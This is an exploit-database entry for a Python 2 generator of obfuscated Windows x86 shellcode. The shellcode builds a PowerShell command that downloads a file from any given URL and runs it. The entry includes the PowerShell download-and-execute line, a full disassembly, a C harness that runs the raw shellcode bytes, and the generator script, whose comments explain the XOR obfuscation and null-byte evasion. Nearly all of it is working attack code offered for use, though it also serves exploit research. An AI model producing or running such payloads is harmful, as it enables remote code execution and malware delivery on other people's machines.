
Win x86-64 - Download & execute Generator

🗓️ 16 Mar 2015 00:00:00Reported by Ali RazmjooType 
exploitdb

Obfuscated Shellcode for Windows x86/x64 Download & Execute using PowerShell

Code
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: dynamic; depends on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec =>  0x77b1e695
#ExitProcess =>  0x77ae2acf
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#====================================
#Ali Razmjoo , ['[email protected]','[email protected]']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How does it work?
'''
C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:\file.exe
Enter:C:\Ali.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o:     file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
   0:   31 c0                   xor    %eax,%eax
   2:   50                      push   %eax
   3:   68 41 41 65 22          push   $0x22654141
   8:   58                      pop    %eax
   9:   c1 e8 08                shr    $0x8,%eax
   c:   c1 e8 08                shr    $0x8,%eax
   f:   50                      push   %eax
  10:   b8 34 47 0b 4d          mov    $0x4d0b4734,%eax
  15:   bb 5d 69 6e 35          mov    $0x356e695d,%ebx
  1a:   31 d8                   xor    %ebx,%eax
  1c:   50                      push   %eax
  1d:   b8 43 32 10 22          mov    $0x22103243,%eax
  22:   bb 79 6e 51 4e          mov    $0x4e516e79,%ebx
  27:   31 d8                   xor    %ebx,%eax
  29:   50                      push   %eax
  2a:   b8 60 05 42 32          mov    $0x32420560,%eax
  2f:   bb 49 78 79 71          mov    $0x71797849,%ebx
  34:   31 d8                   xor    %ebx,%eax
  36:   50                      push   %eax
  37:   b8 0f 1c 2c 14          mov    $0x142c1c0f,%eax
  3c:   bb 6a 64 49 33          mov    $0x3349646a,%ebx
  41:   31 d8                   xor    %ebx,%eax
  43:   50                      push   %eax
  44:   b8 07 3e 0b 40          mov    $0x400b3e07,%eax
  49:   bb 46 52 62 6e          mov    $0x6e625246,%ebx
  4e:   31 d8                   xor    %ebx,%eax
  50:   50                      push   %eax
  51:   b8 44 0a 78 07          mov    $0x7780a44,%eax
  56:   bb 63 49 42 5b          mov    $0x5b424963,%ebx
  5b:   31 d8                   xor    %ebx,%eax
  5d:   50                      push   %eax
  5e:   b8 0f 16 4b 0d          mov    $0xd4b160f,%eax
  63:   bb 6a 31 67 2d          mov    $0x2d67316a,%ebx
  68:   31 d8                   xor    %ebx,%eax
  6a:   50                      push   %eax
  6b:   b8 18 62 5c 1f          mov    $0x1f5c6218,%eax
  70:   bb 61 4c 39 67          mov    $0x67394c61,%ebx
  75:   31 d8                   xor    %ebx,%eax
  77:   50                      push   %eax
  78:   b8 1b 2d 1e 1f          mov    $0x1f1e2d1b,%eax
  7d:   bb 6b 58 6a 6b          mov    $0x6b6a586b,%ebx
  82:   31 d8                   xor    %ebx,%eax
  84:   50                      push   %eax
  85:   b8 45 40 41 66          mov    $0x66414045,%eax
  8a:   bb 3d 78 77 49          mov    $0x4977783d,%ebx
  8f:   31 d8                   xor    %ebx,%eax
  91:   50                      push   %eax
  92:   b8 02 1f 4b 45          mov    $0x454b1f02,%eax
  97:   bb 6d 6b 38 6a          mov    $0x6a386b6d,%ebx
  9c:   31 d8                   xor    %ebx,%eax
  9e:   50                      push   %eax
  9f:   b8 24 3e 19 32          mov    $0x32193e24,%eax
  a4:   bb 45 4e 6a 5a          mov    $0x5a6a4e45,%ebx
  a9:   31 d8                   xor    %ebx,%eax
  ab:   50                      push   %eax
  ac:   b8 00 5e 3a 35          mov    $0x353a5e00,%eax
  b1:   bb 6c 73 49 5b          mov    $0x5b49736c,%ebx
  b6:   31 d8                   xor    %ebx,%eax
  b8:   50                      push   %eax
  b9:   b8 1f 37 40 24          mov    $0x2440371f,%eax
  be:   bb 6d 52 32 41          mov    $0x4132526d,%ebx
  c3:   31 d8                   xor    %ebx,%eax
  c5:   50                      push   %eax
  c6:   b8 2e 35 68 31          mov    $0x3168352e,%eax
  cb:   bb 5a 4c 45 41          mov    $0x41454c5a,%ebx
  d0:   31 d8                   xor    %ebx,%eax
  d2:   50                      push   %eax
  d3:   b8 48 1e 1c 15          mov    $0x151c1e48,%eax
  d8:   bb 67 6e 69 61          mov    $0x61696e67,%ebx
  dd:   31 d8                   xor    %ebx,%eax
  df:   50                      push   %eax
  e0:   b8 26 28 0d 5d          mov    $0x5d0d2826,%eax
  e5:   bb 4f 45 62 33          mov    $0x3362454f,%ebx
  ea:   31 d8                   xor    %ebx,%eax
  ec:   50                      push   %eax
  ed:   b8 20 57 1d 45          mov    $0x451d5720,%eax
  f2:   bb 47 78 63 36          mov    $0x36637847,%ebx
  f7:   31 d8                   xor    %ebx,%eax
  f9:   50                      push   %eax
  fa:   b8 04 6a 24 3b          mov    $0x3b246a04,%eax
  ff:   bb 77 44 4b 49          mov    $0x494b4477,%ebx
 104:   31 d8                   xor    %ebx,%eax
 106:   50                      push   %eax
 107:   b8 18 0f 0a 32          mov    $0x320a0f18,%eax
 10c:   bb 6c 6e 78 47          mov    $0x47786e6c,%ebx
 111:   31 d8                   xor    %ebx,%eax
 113:   50                      push   %eax
 114:   b8 7d 18 3c 27          mov    $0x273c187d,%eax
 119:   bb 52 6c 5d 55          mov    $0x555d6c52,%ebx
 11e:   31 d8                   xor    %ebx,%eax
 120:   50                      push   %eax
 121:   b8 03 44 60 60          mov    $0x60604403,%eax
 126:   bb 77 34 5a 4f          mov    $0x4f5a3477,%ebx
 12b:   31 d8                   xor    %ebx,%eax
 12d:   50                      push   %eax
 12e:   b8 47 6b 1f 20          mov    $0x201f6b47,%eax
 133:   bb 6f 4c 77 54          mov    $0x54774c6f,%ebx
 138:   31 d8                   xor    %ebx,%eax
 13a:   50                      push   %eax
 13b:   b8 2a 5e 2b 20          mov    $0x202b5e2a,%eax
 140:   bb 6c 37 47 45          mov    $0x4547376c,%ebx
 145:   31 d8                   xor    %ebx,%eax
 147:   50                      push   %eax
 148:   b8 59 07 12 0e          mov    $0xe120759,%eax
 14d:   bb 35 68 73 6a          mov    $0x6a736835,%ebx
 152:   31 d8                   xor    %ebx,%eax
 154:   50                      push   %eax
 155:   b8 01 59 11 2c          mov    $0x2c115901,%eax
 15a:   bb 45 36 66 42          mov    $0x42663645,%ebx
 15f:   31 d8                   xor    %ebx,%eax
 161:   50                      push   %eax
 162:   b8 22 22 4e 5a          mov    $0x5a4e2222,%eax
 167:   bb 4c 56 67 74          mov    $0x7467564c,%ebx
 16c:   31 d8                   xor    %ebx,%eax
 16e:   50                      push   %eax
 16f:   b8 00 37 1b 48          mov    $0x481b3700,%eax
 174:   bb 43 5b 72 2d          mov    $0x2d725b43,%ebx
 179:   31 d8                   xor    %ebx,%eax
 17b:   50                      push   %eax
 17c:   b8 4a 1f 22 13          mov    $0x13221f4a,%eax
 181:   bb 64 48 47 71          mov    $0x71474864,%ebx
 186:   31 d8                   xor    %ebx,%eax
 188:   50                      push   %eax
 189:   b8 6a 23 03 18          mov    $0x1803236a,%eax
 18e:   bb 4a 6d 66 6c          mov    $0x6c666d4a,%ebx
 193:   31 d8                   xor    %ebx,%eax
 195:   50                      push   %eax
 196:   b8 2d 54 57 1c          mov    $0x1c57542d,%eax
 19b:   bb 47 31 34 68          mov    $0x68343147,%ebx
 1a0:   31 d8                   xor    %ebx,%eax
 1a2:   50                      push   %eax
 1a3:   b8 4e 15 36 5a          mov    $0x5a36154e,%eax
 1a8:   bb 39 38 79 38          mov    $0x38793839,%ebx
 1ad:   31 d8                   xor    %ebx,%eax
 1af:   50                      push   %eax
 1b0:   b8 59 7f 1f 04          mov    $0x41f7f59,%eax
 1b5:   bb 79 57 51 61          mov    $0x61515779,%ebx
 1ba:   31 d8                   xor    %ebx,%eax
 1bc:   50                      push   %eax
 1bd:   b8 47 56 1d 2f          mov    $0x2f1d5647,%eax
 1c2:   bb 65 70 3d 54          mov    $0x543d7065,%ebx
 1c7:   31 d8                   xor    %ebx,%eax
 1c9:   50                      push   %eax
 1ca:   b8 2c 18 08 54          mov    $0x5408182c,%eax
 1cf:   bb 4d 76 6c 74          mov    $0x746c764d,%ebx
 1d4:   31 d8                   xor    %ebx,%eax
 1d6:   50                      push   %eax
 1d7:   b8 5a 34 58 1b          mov    $0x1b58345a,%eax
 1dc:   bb 39 5b 35 76          mov    $0x76355b39,%ebx
 1e1:   31 d8                   xor    %ebx,%eax
 1e3:   50                      push   %eax
 1e4:   b8 3f 0f 4b 41          mov    $0x414b0f3f,%eax
 1e9:   bb 53 63 6b 6c          mov    $0x6c6b6353,%ebx
 1ee:   31 d8                   xor    %ebx,%eax
 1f0:   50                      push   %eax
 1f1:   b8 4a 1e 59 0b          mov    $0xb591e4a,%eax
 1f6:   bb 38 6d 31 6e          mov    $0x6e316d38,%ebx
 1fb:   31 d8                   xor    %ebx,%eax
 1fd:   50                      push   %eax
 1fe:   b8 49 2b 16 2a          mov    $0x2a162b49,%eax
 203:   bb 39 44 61 4f          mov    $0x4f614439,%ebx
 208:   31 d8                   xor    %ebx,%eax
 20a:   50                      push   %eax
 20b:   89 e0                   mov    %esp,%eax
 20d:   bb 41 41 41 01          mov    $0x1414141,%ebx
 212:   c1 eb 08                shr    $0x8,%ebx
 215:   c1 eb 08                shr    $0x8,%ebx
 218:   c1 eb 08                shr    $0x8,%ebx
 21b:   53                      push   %ebx
 21c:   50                      push   %eax
 21d:   bb 95 e6 b1 77          mov    $0x77b1e695,%ebx
 222:   ff d3                   call   *%ebx
 224:   bb cf 2a ae 77          mov    $0x77ae2acf,%ebx
 229:   ff d3                   call   *%ebx
C:\Users\Ali\Desktop>
#you have your shellcode now
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b
\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
}
=======================================
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
C:\Users\Ali\Desktop>shellcode.exe
Length: 173
C:\Users\Ali\Desktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second 
'''
# Python 2 script (raw_input, str.encode('hex'), integer `/`): reads a URL and a
# local file name, builds a PowerShell download-and-run command line, and writes
# x86 assembly to shellcode.asm that pushes that string onto the stack with every
# 4-byte chunk XOR-obfuscated, then calls two hard-coded library addresses.
import random,binascii
# Alphabet for the per-chunk XOR keys. All printable ASCII, so a key never
# contributes a 0x00 byte to the `mov ebx,<key>` immediate.
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
# Prologue: push a zero dword first. Because the stack grows downward it ends up
# at the highest address, directly after the last character of the string,
# acting as the NUL terminator.
p1 = '''xor eax,eax
push eax 
'''
# Epilogue: eax = esp (start of the pushed string). ebx is built as
# 0x01414141 >> 24 == 1 so the immediate contains no zero byte (same filler
# trick as the leading-zero branch in the loop below). Two arguments (1, string
# pointer) are pushed and an indirect call is made through the fixed address the
# file header labels WinExec, followed by the one labelled ExitProcess. The
# addresses are baked in at generation time, so the output is only valid on the
# build they were taken from (see header).
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''
# Only the first whitespace-separated token of each answer is kept.
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
# The command line that the shellcode will hand to WinExec (same shape as the
# "Execute" line in the header).
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
# Hand-rolled len(sen) - 1: index of the last character.
m = 0
for word in sen:
        m += 1
m = m - 1
# Reverse the string. Chunks are pushed from this reversed copy so that, after
# all pushes, the bytes sit in memory in their original order.
stack = ''
while(m>=0):
        stack += sen[m]
        m -= 1
# Two hex digits per byte (Python 2 str.encode('hex')).
stack = stack.encode('hex')
# Pad the front of the reversed hex with up to three '00' bytes until the length
# is a multiple of 8 hex digits (one 32-bit push). The pad bytes become the high
# bytes of the first dword pushed, i.e. extra zero bytes right after the
# terminator from p1.
skip = 1
if len(stack) % 8 == 0:
        skip = 0
# NOTE: `skip is 1` / `skip is 0` compare by identity; this only works because
# CPython caches small ints. `==` is the intended operator.
if skip is 1:
        stack = '00' + stack
        if len(stack) % 8 == 0:
                skip = 0
        if skip is 1:
                stack = '00' + stack
                if len(stack) % 8 == 0:
                        skip = 0
        if skip is 1:
                stack = '00' + stack
                if len(stack) % 8 == 0:
                        skip = 0
# Leftover no-op; zxzxzxz is never read.
if len(stack) % 8 == 0:
        zxzxzxz = 0
# Number of 32-bit chunks (Python 2 `/` is integer division here); n:z is the
# sliding 8-digit window into the hex string.
m = len(stack) / 8
c = 0
n = 0
z = 8
# Truncate the output file with the prologue, then reopen in append mode for the
# per-chunk instructions and the epilogue.
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
        v = 'push 0x' + stack[n:z]
        skip = 0
        # Leading zero bytes can only come from the padding above. For those
        # chunks the zero bytes are replaced with 0x41 filler in the immediate,
        # the value is popped into eax, the filler is shifted out (8 bits per
        # pad byte) and the cleaned value is pushed back. The three tests are
        # run against the possibly rewritten `v`, but with 1-3 pad bytes only
        # one of them fires.
        if '0x000000' in v:
                skip = 1
                q1 = v[13:]
                v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
        if '0x0000' in v:
                skip = 1
                q1 = v[11:]
                v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
        if '0x00' in v:
                skip = 1
                q1 = v[9:]
                v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
        if skip is 1:
                shf.write(v)
        # Ordinary chunk: pick a random 4-character key from `chars`, XOR it
        # into the chunk and emit the recognisable
        #   mov eax,<chunk ^ key> / mov ebx,<key> / xor eax,ebx / push eax
        # sequence seen in the disassembly in the header. "%x" prints the XOR
        # result without leading zeros.
        if skip is 0:
                v = v.rsplit()
                zzz = ''
                for w in v:
                        if '0x' in w:
                                zzz = str(w)
                s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
                s1 = '0x%s'%s1
                data = "%x" % (int(zzz, 16) ^ int(s1, 16))
                v =  'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
                shf.write(v)
        n += 8
        z += 8
        c += 1
shf.write(p2)
shf.close()

